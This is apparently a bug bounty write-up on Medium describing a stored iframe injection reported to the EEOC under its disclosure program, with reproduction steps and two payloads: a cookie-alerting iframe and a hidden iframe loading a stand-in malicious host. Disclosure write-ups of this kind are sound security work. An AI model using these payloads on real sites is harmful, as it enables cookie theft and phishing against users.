Hello folks this is my 2nd Medium Write up👋,

I’m excited to share another milestone in my bug bounty journey — recently I reported an Iframe Injection vulnerability in the Equal Employment Opportunity Commission (EEOC) platform under their Vulnerability Disclosure Program, and was honored with a Hall of Fame mention!

In this post, I’ll walk through the bug, its impact, and how I discovered and responsibly disclosed it.

An iframe injection occurs when an attacker is able to inject malicious HTML content into a web page, often using the <iframe> tag. This is somewhat related to XSS (Cross-Site Scripting) but specifically abuses iframes to embed malicious pages or trigger JavaScript events.

Attackers can use this to:

• Steal cookies
• Redirect users to phishing sites

. Load malicious third-party scripts

• Create fake login screens within legitimate websites

Here’s how I found the bug:

1. Navigate to the URL
   https://example.com (actual target redacted for responsible disclosure)
   Log in with a test account.
2. Locate an input field where user-generated content is rendered on the front end.
3. Inject the Payload

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<iframe src=”http://malicious/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Click Save or Submit
The payload was successfully stored and reflected on the page.

1. Trigger the Payload
   When hovering over the iframe, it executed the JavaScript and popped up the cookie alert.

This vulnerability can be used to:

• Steal session cookies or tokens
• Impersonate users or admins
• Launch phishing or clickjacking attacks
• Embed malicious websites that look like the original
• Harm user trust and compromise security

Even though this looks similar to XSS, the exploitation vector is specifically tied to iframe behavior, which can bypass some content filters if not properly handled.

📚 Related References

For those who want to learn more about iframe injection, here are some great articles I recommend:

• 🔗 Iframe Injection Attacks and Mitigation — SecnHack
• 🔗 Iframe Injection and Illegal Redirect — InfoSec Writeups

Join our Telegram Channel More Updates -> https://t.me/anon_courses

This report was acknowledged and added to the Hall of Fame by EEOC, and I’m happy to contribute to making government platforms more secure. 🛡️

If you’re into bug bounty or ethical hacking, never underestimate lesser-known vectors like iframe injection. Always test every input thoroughly and think creatively — that’s often where the bugs hide.

Stay curious, stay ethical. 🔍💻